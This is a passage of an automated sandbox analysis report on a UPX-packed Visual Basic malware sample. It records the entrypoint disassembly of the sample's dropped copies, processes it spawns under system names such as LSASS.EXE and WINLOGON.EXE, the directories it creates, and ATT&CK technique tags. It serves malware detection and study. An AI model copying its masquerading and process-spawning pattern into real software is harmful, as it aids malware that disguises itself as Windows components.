entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Empty.pif\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"WINLOGON.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C456.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"MrHelloween.scr\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C711.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C458.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005900)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005744)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005968)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005832)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005852)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005796)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006092)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006100)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005948)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004192)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006136)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006024)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003924)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003760)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004100)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003484)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004144)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003956)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003400)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003688)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003604)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004088)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004288)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003420)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002460)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"4k51k4.exe\" (UID: 00000000-00005900)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005744)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005968)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005832)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005852)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005796)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006092)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006100)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005948)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004192)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006136)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006024)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003924)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003760)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004100)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003484)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004144)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003956)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003400)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003688)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003604)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004088)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004288)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003420)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002460)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" was detected as \"UPX\" and name: \"Packer\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4k51k4.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4k51k4.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4k51k4.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS .exe\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS .exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS .exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"UPX\" and name: \"Packer\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C456.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C456.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C456.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"UPX\" and name: \"Packer\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrHelloween.scr\" was detected as \"UPX\" and name: \"Packer\"\n \"MrHelloween.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrHelloween.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"4K51K4.EXE.67A9C711.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"4K51K4.EXE.67A9C711.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"4K51K4.EXE.67A9C711.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67A9C458.bin\" was detected as \"UPX\" and name: \"Packer\"\n \"IEXPLORER.EXE.67A9C458.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67A9C458.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500526e9177@CRYPTSP.dll\"\n \"10001100f4125075@rsaenh.dll\"\n \"10001100e0125075@rsaenh.dll\"\n \"08000900d4125075@rsaenh.dll\"\n \"0b000c00c8125075@rsaenh.dll\"\n \"0c000d00b8125075@rsaenh.dll\"\n \"0d000e00a8125075@rsaenh.dll\"\n \"0d000e0098125075@rsaenh.dll\"\n \"0b000c008c125075@rsaenh.dll\"\n \"0b000c0080125075@rsaenh.dll\"\n \"09000a0074125075@rsaenh.dll\"\n \"09000a0068125075@rsaenh.dll\"\n \"0c000d0058125075@rsaenh.dll\"\n \"0a000b004c125075@rsaenh.dll\"\n \"1000110038125075@rsaenh.dll\"\n \"0d000e0028125075@rsaenh.dll\"\n \"0a000b001c125075@rsaenh.dll\"\n \"1100120008125075@rsaenh.dll\"\n \"0b000c00fc115075@rsaenh.dll\"\n \"0c000d00ec115075@rsaenh.dll\"\n \"0e000f00dc115075@rsaenh.dll\"\n \"0e000f00cc115075@rsaenh.dll\"\n \"0e000f00bc115075@rsaenh.dll\"\n \"0e000f00ac115075@rsaenh.dll\"\n \"0e000f009c115075@rsaenh.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005648)\n \"4k51k4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00005900)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005744)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005852)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006100)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00006024)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004100)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004100)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003604)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003604)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005648)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005900)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005744)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has an writable section named \"UPX0\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has an writable section named \"UPX1\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has an writable section named \".rsrc\"\n \"services.exe\" has an writable section named \"UPX0\"\n \"services.exe\" has an writable section named \"UPX1\"\n \"services.exe\" has an writable section named \".rsrc\"\n \"shell.exe\" has an writable section named \"UPX0\"\n \"shell.exe\" has an writable section named 